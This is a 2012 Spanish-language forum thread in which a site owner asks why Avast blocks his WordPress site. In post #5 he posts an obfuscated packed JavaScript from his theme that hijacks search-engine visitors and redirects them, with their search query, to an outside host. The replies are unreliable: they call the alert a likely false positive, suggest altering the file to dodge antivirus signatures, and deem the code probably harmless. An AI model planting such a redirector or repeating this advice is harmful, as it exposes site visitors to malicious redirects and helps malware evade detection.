Virus en mi sitio web con extensión JS

jafp_pe · #1 (**permalink**) 26/01/2012, 12:56

Hola amigos, mi sitio web "postalesxd .com " en mi explorador chrome va muy bien quizá sea por que no tengo antivirus instalados quizá, pero el punto aquí es que en el pc de mi novia, utiliza de navegador chrome y tiene antivirus AVAST le sale un mensaje de alerta que le imposibilita abrir el sitio web con este mensaje:

gzip infeccion JS redirector MR /trj / e buscado en mis archivos algun link medio malicioso pero nada, no se cual es o mejor dicho no veo alguno por mi ignorancia en el tema, ayúdenme mil gracias!

maycolalvarez · #2 (**permalink**) 26/01/2012, 13:02

mmm, avast es bien conocido por sus falsas alarmas, investigue en la página del producto.

a lo sumo Js no puede hacer mucho, pero es grave en casos como:

Windows Script Host (WSH) Activo, pero sólo afectaría en Internet Explorer

Ejecutar JS desde local, lo que activa el WSH

Que genere un ciclo sin fin, pero chrome es uno de los navegadores preparados para ello, no tarda mucho en detectarlo y detenerlo, sin necesidad de antivirus externos

jafp_pe · #3 (**permalink**) 26/01/2012, 13:24

:( que podría hacer si una persona no puede acceder a mi sitio yo creo que miles que utilizan ese antivirus o que se yo tampoco puedan hacerlo :(

maycolalvarez · #4 (**permalink**) 26/01/2012, 14:08

a lo sumo debes revisar si en realidad no han inyectado ese código en su web

si no es así, puede intentar cambiar ligeramente el archivo js (añadiendo espacios y algunos comentarios) de manera que no coincidan con los patrones de avast que lo marcan como virus, o usar un compresor como YUI compressor

jafp_pe · #5 (**permalink**) 26/01/2012, 15:25

Quizas este archivo era el problema:
postalesxd.com/wp-content/themes/gPlusTheme/script.js

será? por que.. si es que fuese, es un archivo malo?

El error fue solucionado "Creo"

Código:

<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script

Por favor chekeen y avisen si todo esta en orden :) , gracias!

maycolalvarez · #6 (**permalink**) 27/01/2012, 08:34

el código está comprimido, pero tampoco es lo suficientemente largo como para tratarse de un robador de cookies conocido, en general si la web funciona perfectamente sin él, puede prescindir del mismo